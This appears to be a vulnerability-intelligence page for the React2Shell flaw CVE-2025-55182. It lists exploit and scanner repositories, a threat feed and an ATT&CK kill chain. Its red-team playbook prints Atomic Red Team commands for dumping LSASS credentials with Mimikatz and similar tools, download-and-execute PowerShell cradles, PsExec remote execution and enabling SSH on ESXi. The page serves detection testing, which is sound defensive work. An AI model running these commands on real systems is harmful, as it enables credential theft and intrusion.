CVE-2025-55182, also known as React2Shell, is a critical vulnerability affecting Next.js applications using React Server...
yannisduvignau 0 0 2026-01-06 View
en0f/CVE-2025-55182-poc-json
CVE-2025-55182-poc-json
en0f 0 0 2026-01-07 View
termireum/react2shell
React2Shell is a high-performance vulnerability scanner written in Go, specifically designed to detect Server-Side Remot...
termireum 0 0 2026-01-12 View
dbwlsdnr95/CVE-2025-55182
dbwlsdnr95 0 0 2025-12-20 View
Least-Significant-Bit/CVE-2025-55182
Remote code execution for React Server Components 19.0.0 - 19.2.0
Least-Significant-Bit 0 0 2026-01-13 View
faisha1311/React2Shell-CVE-2025-55182-TryHackMe
faisha1311 0 0 2026-01-16 View
BBD-YZZ/CVE-2025-55182
CVE-2025-55182(命令执行、反弹shell、注入内存马)
BBD-YZZ 0 0 2026-01-20 View
Vladjrfhfg/React-site-CVE-2025-55182
Vladjrfhfg 0 0 2026-01-20 View
Namsom007/CVE-2025-55182-Exploit
CVE-2025-55182 React Server Components Remote Code Execution Exploit Lab
Namsom007 0 0 2026-01-20 View
deepankarkumar1/CVE-2025-55182_Vulnerable-Application
deepankarkumar1 0 0 2026-01-29 View
wnaspy/CVE-2025-55182
React2shell exploit (CVE-2025-55182+CVE-2025-66478)
wnaspy 0 0 2026-01-31 View
Kryptopacy/Next.js-RCE-Patcher--CVE-2025-55182-
Kryptopacy 0 0 2025-12-06 View
atiilla/CVE-2025-55182
RCE on Next 16.0.6
atiilla 0 0 2026-02-10 View
BakhodiribnYashinibnMansur/CVE-2025-55182
BakhodiribnYashinibnMansur 0 0 2025-12-10 View
BIG02-bot/React2Shell-CVE-2025-55182-An-lise-T-cnica
BIG02-bot 0 0 2026-02-13 View
luoqichen/CVE-2025-55182-POC
luoqichen 0 0 2026-03-06 View
lutraat/CVE-2025-55182-React-RSC-Exploit
Basic Proof of Concept (Poc) Exploit for React RSC - CVE-2025-55182
lutraat 0 0 2026-03-12 View
monarchfish/cve-2025-55182-poc
Proof-of-concept for CVE-2025-55182 (React2Shell): unauthenticated RCE in React Server Components / Next.js via Flight p...
monarchfish 0 0 2026-03-17 View
vick333-peniel/vick333-peniel.github.io
🛠️ Exploit CVE-2025-55182 with this GUI tool for vulnerability detection, command execution, and shell access on Windows...
vick333-peniel 0 0 2025-08-06 View
nexxp90/CVE-2025-55182_RCE_Exploit
REC Exploit is a Python-based security testing tool that automates detection of potential RCE conditions in web applicat...
nexxp90 0 0 2026-03-17 View
RyosukeDTomita/CVE-2025-55182
CVE-2025-55182 — React2Shell
RyosukeDTomita 0 0 2026-03-24 View
eagle-nett/React2Shell-PoC-CVE-2025-55182
Khai thác lỗ hổng bảo mật CVE-2025-55182
eagle-nett 0 0 2026-03-24 View
0x0asif/CVE-2025-55182
0x0asif 0 0 2026-03-29 View
porsellaj/cve-2025-55182-react2shell-analysis
Technical analysis of CVE-2025-55182 (React2Shell RCE vulnerability)
porsellaj 0 0 2026-04-04 View
ogpourya/CVE-2025-55182
Interactive shell exploitation for CVE-2025-55182
ogpourya 0 0 2025-12-06 View
TamaGorengs/react2shell-poc-CVE-2025-55182
TamaGorengs 0 0 2025-12-20 View
sobuj0007/Nextjs_RCE_Exploit_Tool
🔍 Exploit CVE-2025-55182 in Next.js with this versatile tool for security research, featuring advanced payloads and WAF ...
sobuj0007 0 0 2025-12-25 View
shibaaa204/React2Shell
Poc for React2Shell CVE-2025-55182
shibaaa204 0 0 2026-04-24 View
DeDnY/CVE-2025-55182-in-docker
CVE-2025-55182-in-docker
DeDnY 0 0 2026-03-03 View
ducducuc111/CVE-2025-55182-poc
ducducuc111 0 0 2025-12-04 View
dissy123/cve-2025-55182
dissy123 0 0 2025-12-04 View
Chelsea486MHz/CVE-2025-55182-test
See if your endpoint could be vulnerable.
Chelsea486MHz 0 0 2025-12-04 View
carlosaruy/CVE-2025-55182
a critical Remote Code Execution (RCE) vulnerability in React Server Components (RSC). It also includes a realistic "Lab...
carlosaruy 0 0 2025-12-04 View
0xPThree/cve-2025-55182
0xPThree 0 0 2025-12-04 View
im-hanzou/CVE-2025-55182-POC-SCANNER
Unified Security Research Tool
im-hanzou 0 0 2025-12-04 View
klassiker/CVE-2025-55182
klassiker 0 0 2025-12-04 View
ps-interactive/cve-2025-55182
Vulnerable REACT app in docker container and poc code - for demos
ps-interactive 0 0 2025-12-04 View
aquinn-r7/CVE-2025-55182-VulnCheckPOC
Functional Python POC to test if servers are vulnerable to CVE-2025-55182
aquinn-r7 0 0 2025-12-04 View
sherlocksecurity/CVE-2025-55182-Exploit-scanner
sherlocksecurity 0 0 2025-12-05 View
Darker-Ink/react-ssr-vulnerability
This is a POC script for CVE-2025-55182 (React SSR RCE)
Darker-Ink 0 0 2025-12-05 View
topstar88/CVE-2025-55182
topstar88 0 0 2025-12-05 View
selectarget/CVE-2025-55182-Exploit
selectarget 0 0 2025-12-05 View
younesZdDz/CVE-2025-55182
younesZdDz 0 0 2025-12-05 View
ngvcanh/CVE-2025-55182-Attack-Analysis
Real-world attack analysis of CVE-2025-55182 (React2Shell) - React Server Components RCE vulnerability
ngvcanh 0 0 2025-12-05 View
Golden-Secure/CVE-2025-55182
Interactive RCE Web Shell (CVE-2025-55182) BY Golden-Security
Golden-Secure 0 0 2025-12-05 View
alexandre-briongos-wavestone/react-cve-2025-55182-lab
alexandre-briongos-wavestone 0 0 2025-12-05 View
prestonhashworth/cve-2025-55182
prestonhashworth 0 0 2025-12-05 View
nomorebreach/POC-CVE-2025-55182
POC for CVE-2025-55182 React2Shell
nomorebreach 0 0 2025-12-05 View
nerium-security/CVE-2025-55182
Host-based detection rules for the RCE vulnerability in the React JavaScript framework.
nerium-security 0 0 2025-12-05 View
zessu/CVE-2025-55182-Typescript
Show case CVE-2025-55182 POC in Typrescript/Javascript
zessu 0 0 2025-12-05 View
mxm0z/r2s
A web-based vulnerability scanner for CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability in React Serv...
mxm0z 0 0 2025-12-05 View
NathanJ60/react2shell-interactive
CVE-2025-55182 Interactive PoC - React Server Components RCE - Educational Security Research
NathanJ60 0 0 2025-12-05 View
ilixm/PoC-RCE-CVE-2025-55182
ilixm 0 0 2025-12-09 View
oguri-souhei/CVE-2025-55182
CVE-2025-55182 の検証用
oguri-souhei 0 0 2025-12-12 View
hulh122/CVE-2025-55182
hulh122 0 0 2025-12-15 View
amikanev/CVE-2025-55182-LAB
amikanev 0 0 2026-03-30 View
pitufo1721/CVE-2025-55182-GodzillaMemoryShell
pitufo1721 0 0 2023-07-07 View
fankh/cve-2025-55182-test-lab-windows
fankh 0 0 2025-12-06 View
vyvivekyadav04/RSC-Infra-Scanner
This is a fast, asynchronous Python tool that fingerprints domains for likely Next.js App Router / React Server Componen...
vyvivekyadav04 0 0 2025-12-06 View
robbin0919/CVE-2025-55182
robbin0919 0 0 2025-12-07 View
FurkanKAYAPINAR/React-Next-Scanner
CVE-2025-55182 and CVE-2025-66478
FurkanKAYAPINAR 0 0 2025-12-08 View
Goultarde/CVE-2025-55182-React2Shell-Lab
Goultarde 0 0 2025-12-31 View
byte16384/CVE-2025-55182
proof
byte16384 0 0 2025-12-09 View
mooowu/cve-2025-55182-poc
mooowu 0 0 2026-01-10 View
H4R335HR/reactshell
Interactive shell client for React Server Components RCE exploitation via __proto__ pollution (CVE-2025-55182)
H4R335HR 0 0 2026-02-17 View
amir-malek/react-cve-2025-55182
amir-malek 0 0 2025-12-09 View
Legus-Yeung/CVE-2025-55182-exploit
Legus-Yeung 0 0 2025-12-10 View
DanielXavierJob/-CVE-2025-55182
DanielXavierJob 0 0 2025-12-10 View
nanwinata/CVE-2025-55182-Scanner
nanwinata 0 0 2025-12-05 View
sponte/nextjs-cve-version-confusion
Reproduction for Next.js CVE-2025-55182 version string confusion issue
sponte 0 0 2025-12-10 View
J4ck3LSyN-Gen2/CVE-2025-55182
A simple toolkit to validate, exploit & gain an interactive shell via the react2Shell Next.js RCE.
J4ck3LSyN-Gen2 0 0 2025-12-10 View
min8282/CVE-2025-55182
min8282 0 0 2025-12-11 View
exrienz/CVE-2025-55182-NextJS-Scanner-React2Shell-PoC
exrienz 0 0 2025-12-11 View
yuta3003/CVE-2025-55182
yuta3003 0 0 2025-12-12 View
degenwithheart/React2Shell-Vulnerability-Verification-Script
React2Shell Vulnerability Verification Script (React2Shell also known as CVE-2025-55182).
degenwithheart 0 0 2025-12-18 View
StillSoul/CVE-2025-55182
A critical-severity vulnerability in React Server Components (CVE-2025-55182) affects React 19 and frameworks that use i...
StillSoul 0 0 2025-12-06 View
lee191/CVE-2025-55182
lee191 0 0 2025-12-08 View
ahmedshamsddin/CVE-2025-55182
ahmedshamsddin 0 0 2025-12-07 View
revasec/CVE-2025-55182-Interactive-mode
revasec 0 0 2026-02-25 View
vick333-peniel/ReactExploitGUI
🛠️ Exploit CVE-2025-55182 effortlessly with this GUI tool for vulnerability detection, command execution, and Shell reve...
vick333-peniel 0 0 2025-04-21 View
toprak-t800/CVE-2025-55182
toprak-t800 0 0 2026-04-04 View
Ghost121111/Blackash-CVE-2025-55182
🚨 Identify and address CVE-2025-55182, a critical React Server vulnerability allowing remote code execution without auth...
Ghost121111 0 0 2025-12-24 View
9988700/CVE-2025-55182-POC-NEXTJS
⚡ Discover and exploit CVE-2025-55182 with this PoC, offering reliable remote code execution tests for React Server Comp...
9988700 0 0 2025-12-26 View
Asder10/asder10.github.io
🛠️ Exploit CVE-2025-55182 using React2Shell, an advanced framework for Next.js and React remote code execution. Secure y...
Asder10 0 0 2026-01-08 View
W41T3D3V1L/COMPLETE-CVE-2025-55182
W41T3D3V1L 0 0 2025-12-12 View
dajneem23/CVE-2025-55182
dajneem23 0 0 2025-12-19 View
ethicalrohitt/React2Shell_cve-2025-55182
ethicalrohitt 0 0 2025-12-07 View
foodmen2111/test-cve-2025-55182
Thực hiện để test CVE 2025 55182
foodmen2111 0 0 2025-12-09 View
garux-sec/PoC-react2shell-CVE-2025-55182
PoC-react2shell-CVE-2025-55182
garux-sec 0 0 2025-12-09 View
Ankitspandey07/React2Shell
CVE-2025-55182-advanced-scanner
Ankitspandey07 0 0 2025-12-09 View
Sotatek-KhaiNguyen3/CVE-2025-55182
Sotatek-KhaiNguyen3 0 0 2025-12-10 View
gonaumov/cve-2025-55182-checker
A portable Bash script to detect vulnerable versions of React Server DOM and Next.js packages affected by [CVE-2025-5518...
gonaumov 0 0 2025-12-10 View
aseemyash/krle
CVE-2025-55182 & CVE-2025-66478 proof of concepts
aseemyash 0 0 2025-12-11 View
4nuxd/React2Shell
R2S is a comprehensive exploitation and post-exploitation framework targeting the Next.js React Server Components vulner...
4nuxd 0 0 2025-12-11 View
Shadowroot97/React2Shell-CVE-2025-55182
POC React2Shell-CVE-2025-55182
Shadowroot97 0 0 2025-12-12 View
premdanav/react2shelldemo
This repo contains the scripts you can execute to simulate the (CVE-2025-55182) along with next.js server
premdanav 0 0 2025-12-15 View
faizdotid/rust-cve-2025-55182
faizdotid 0 0 2025-12-08 View
itumo-arigatone/study-CVE-2025-55182
試してみるよん
itumo-arigatone 0 0 2025-12-16 View
trilogy-group/react2shell-scan
React2Shell (CVE-2025-55182) scanner
trilogy-group 0 0 2025-12-11 View
scumfrog/FiberBreak
React2Shell Exploitation Tool (CVE-2025-55182)
scumfrog 0 0 2025-12-16 View
S-Mughal/NextJS-app-CVE-2025-55182
S-Mughal 0 0 2025-12-16 View
d0cnull/nextjs-CVE-2025-55182
d0cnull 0 0 2025-12-16 View
Evillm/CVE-2025-55182-PoC
Evillm 0 0 2026-02-04 View
Mustafa1p/Next.js-RCE-Scanner---CVE-2025-55182-CVE-2025-66478
An advanced vulnerability scanner for detecting **CVE-2025-55182** and **CVE-2025-66478** - critical Remote Code Executi...
Mustafa1p 0 0 2025-12-16 View
rashedhasan090/cve-2025-55182-mitigator
rashedhasan090 0 0 2025-12-18 View
MeGaNeKoS/secure-by-default-rce-demo
Secure-by-default demo lab showing how container hardening (distroless images, non-root, read-only filesystem, runtime-i...
MeGaNeKoS 0 0 2025-12-20 View
bigbluewhale111/CVE-2025-55182-LAB
This is a lab for reproducing CVE-2025-55182.
bigbluewhale111 0 0 2025-12-24 View
notkittenn/poc_react2shell
py script proof of concept new CVE-2025-55182 based in lachlan2k script
notkittenn 0 0 2025-12-10 View
grejh0t/CVE-2025-55182
grejh0t 0 0 2025-12-13 View
androidteacher/REACT-CVE-2025-55182-Lab
Lab with PoC
androidteacher 0 0 2026-02-26 View
hujiaozhuzhu/CVE-2025-55182_liyon
CVE-2025-55182
hujiaozhuzhu 0 0 2026-04-02 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

33 events
2026-07-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-05
Threat Sensor Sighting — Some sightings

Sighting activity recorded

2026-07-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-22
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-21
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-14
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2025-12-05
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2025-12-03
Exploit Published (1 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

2021-09-18
PoC Published (497 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Target OS:

Deployed role: Linux · Web Server

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.

Attack Vectors ML

Deserialization Vulnerabilities
100% deserialization
Remote Code Execution
99% rce
Code Injection
66% code_injection
OS Command Injection
45% command_injection

MITRE ATT&CK Techniques (10)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.001 PowerShell Kill Chain execution Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1003.001 LSASS Memory Kill Chain credential-access Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1087.002 Domain Account Kill Chain discovery Linux, macOS, Windows
T1021.002 SMB/Windows Admin Shares Kill Chain lateral-movement Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-586 Object Injection
55%
Medium High

Red Team Playbook

108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1003.001 Create Mini Dump of LSASS.exe using ProcDump Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created...
Command (CMD)
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
T1003.001 Dump LSASS with createdump.exe from .Net v5 Windows PowerShell Privileged
Use createdump executable from .NET to create an LSASS dump. [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
Command (PowerShell)
$exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
T1003.001 Dump LSASS.exe Memory through Silent Process Exit Windows CMD Privileged
WerFault.exe (Windows Error Reporting process that handles process crashes) can be abused to create a memory dump of lsass.exe, in a directory of your choice. This method relies on a mechanism introduced in Windows 7 called Silent Process Exit, which provides the ability to...
Command (CMD)
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
T1003.001 Dump LSASS.exe Memory using NanoDump Windows CMD Privileged
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection. https://github.com/helpsystems/nanodump Upon successful execution, you should find the nanondump.dmp file in the temp directory
Command (CMD)
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
T1003.001 Dump LSASS.exe Memory using Out-Minidump.ps1 Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created...
Command (PowerShell)
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
T1003.001 Dump LSASS.exe Memory using ProcDump Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is...
Command (CMD)
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
T1003.001 Dump LSASS.exe Memory using Windows Task Manager Windows Manual
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions.
T1003.001 Dump LSASS.exe Memory using comsvcs.dll Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
Command (PowerShell)
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
T1003.001 Dump LSASS.exe Memory using direct system calls and API unhooking Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection....
Command (CMD)
"#{dumpert_exe}"
T1003.001 Dump LSASS.exe using imported Microsoft DLLs Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that...
Command (PowerShell)
#{xordump_exe} -out #{output_file} -x 0x41
T1003.001 Dump LSASS.exe using lolbin rdrleakdiag.exe Windows PowerShell Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with lolbin rdrleakdiag.exe. Upon successful execution, you should see the following files created, $env:TEMP\minidump_<PID>.dmp and $env:TEMP\results_<PID>.hlk.
Command (PowerShell)
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
  } elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
      $binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
  } else {
      $binary_path = "File not found"
      exit 1
  }
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force} 
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
T1003.001 LSASS read with pypykatz Windows CMD Privileged
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple usernames and passwords/hashes...
Command (CMD)
"#{venv_path}\Scripts\pypykatz" live lsa 
T1003.001 Offline Credential Theft With Mimikatz Windows CMD Privileged
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
Command (CMD)
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
T1003.001 Powershell Mimikatz Windows PowerShell Privileged
Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks...
Command (PowerShell)
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
T1021.002 Copy and Execute File with PsExec Windows CMD Privileged
Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
Command (CMD)
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
T1021.002 Execute command writing output to local Admin Share Windows CMD Privileged
Executes a command, writing the output to a local Admin Share. This technique is used by post-exploitation frameworks.
Command (CMD)
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
T1021.002 Map Admin Share PowerShell Windows PowerShell
Map Admin share utilizing PowerShell
Command (PowerShell)
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
T1021.002 Map admin share Windows CMD
Connecting To Remote Shares
Command (CMD)
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.001 ATHPowerShellCommandLineParameter -Command parameter variations Windows PowerShell
Executes powershell.exe with variations of the -Command parameter
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments Windows PowerShell
Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations Windows PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
T1059.001 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments Windows PowerShell
Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied
Command (PowerShell)
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
T1059.001 Abuse Nslookup with DNS Records Windows PowerShell
Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. [reference](https://twitter.com/jstrosch/status/1237382986557001729)
Command (PowerShell)
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup  { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
T1059.001 Invoke-AppPathBypass Windows CMD
Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/
Command (CMD)
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
T1059.001 Mimikatz Windows CMD Privileged
Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
Command (CMD)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
T1059.001 Mimikatz - Cradlecraft PsSendKeys Windows PowerShell Privileged
